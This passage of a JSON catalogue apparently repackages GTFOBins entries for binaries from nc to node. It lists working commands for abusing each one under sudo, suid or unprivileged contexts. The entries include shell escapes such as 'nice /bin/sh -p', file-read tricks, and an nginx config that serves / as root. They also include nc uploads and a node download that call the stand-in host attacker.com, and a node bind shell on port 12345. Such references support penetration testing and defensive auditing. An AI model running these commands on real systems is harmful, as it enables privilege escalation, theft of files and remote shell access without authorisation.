shell.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:1:sudo","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:1:suid","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:1:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncdu:shell:0:sudo","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ncdu/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncdu:shell:0:suid","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ncdu/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncdu:shell:0:unprivileged","toolId":"gtfo:ncdu","toolName":"ncdu","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ncdu\nb","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ncdu/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncftp:shell:0:sudo","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ncftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncftp:shell:0:suid","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ncftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ncftp:shell:0:unprivileged","toolId":"gtfo:ncftp","toolName":"ncftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ncftp\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ncftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:needrestart:inherit:0:sudo","toolId":"gtfo:needrestart","toolName":"needrestart","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"echo '...' >/path/to/temp-file\nneedrestart -c /path/to/temp-file","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/needrestart/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:needrestart:inherit:0:unprivileged","toolId":"gtfo:needrestart","toolName":"needrestart","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"echo '...' >/path/to/temp-file\nneedrestart -c /path/to/temp-file","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/needrestart/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:neofetch:file-read:0:sudo","toolId":"gtfo:neofetch","toolName":"neofetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"neofetch --ascii /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/neofetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:neofetch:file-read:0:unprivileged","toolId":"gtfo:neofetch","toolName":"neofetch","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"neofetch --ascii /path/to/input-file","description":"The file content is used as the logo while some other information is displayed on its right.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/neofetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:neofetch:shell:0:sudo","toolId":"gtfo:neofetch","toolName":"neofetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh' >/path/to/temp-file\nneofetch --config /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/neofetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:neofetch:shell:0:unprivileged","toolId":"gtfo:neofetch","toolName":"neofetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh' >/path/to/temp-file\nneofetch --config /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/neofetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nft:file-read:0:sudo","toolId":"gtfo:nft","toolName":"nft","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nft -f /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nft/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nft:file-read:0:unprivileged","toolId":"gtfo:nft","toolName":"nft","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nft -f /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nft/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:download:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"cat >/path/to/temp-file <<EOF\nuser root;\nhttp {\n server {\n listen 80;\n root /;\n autoindex on;\n dav_methods PUT;\n }\n}\nevents {}\nEOF\n\nnginx -c /path/to/temp-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:library-load:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:library-load:0:suid","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:library-load:0:unprivileged","toolId":"gtfo:nginx","toolName":"nginx","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"cat >/path/to/temp-file <<EOF\nload_module /path/to/lib.so;\nEOF\n\nnginx -t -c /path/to/temp-file","description":"Alternatively, the `ssl_engine` directive can be used.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nginx:upload:0:sudo","toolId":"gtfo:nginx","toolName":"nginx","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cat >/path/to/temp-file <<EOF\nuser root;\nhttp {\n server {\n listen 80;\n root /;\n autoindex on;\n dav_methods PUT;\n }\n}\nevents {}\nEOF\n\nnginx -c /path/to/temp-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nginx/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nice:shell:0:sudo","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nice /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nice:shell:0:suid","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nice /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nice:shell:0:unprivileged","toolId":"gtfo:nice","toolName":"nice","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nice /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nice/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nl:file-read:0:sudo","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nl:file-read:0:suid","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nl:file-read:0:unprivileged","toolId":"gtfo:nl","toolName":"nl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nl -bn -w1 -s '' /path/to/input-file","description":"The read file content is corrupted by a leading space added to each line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nm:file-read:0:sudo","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nm:file-read:0:suid","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nm:file-read:0:unprivileged","toolId":"gtfo:nm","toolName":"nm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nm /path/to/input-file","description":"The file content is treated as command line options and disclosed through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-read:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-read:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-read:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nmap -iL /path/to/input-file","description":"The file is actually parsed as a list of hosts/networks, lines are leaked through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-write:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-write:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:file-write:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"nmap -oG=/path/to/output-file DATA","description":"The payload appears inside the regular nmap output.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:inherit:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:inherit:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:inherit:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\nnmap --script=/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:shell:0:sudo","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:shell:0:suid","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nmap:shell:0:unprivileged","toolId":"gtfo:nmap","toolName":"nmap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nmap --interactive\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:bind-shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:bind-shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"]);\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:bind-shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n}).listen(12345)'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:download:0:sudo","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:download:0:suid","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:download:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"node -e 'require(\"http\").get(\"http://attacker.com/path/to/input-file\", res => res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-read:0:sudo","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-read:0:suid","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"node -e 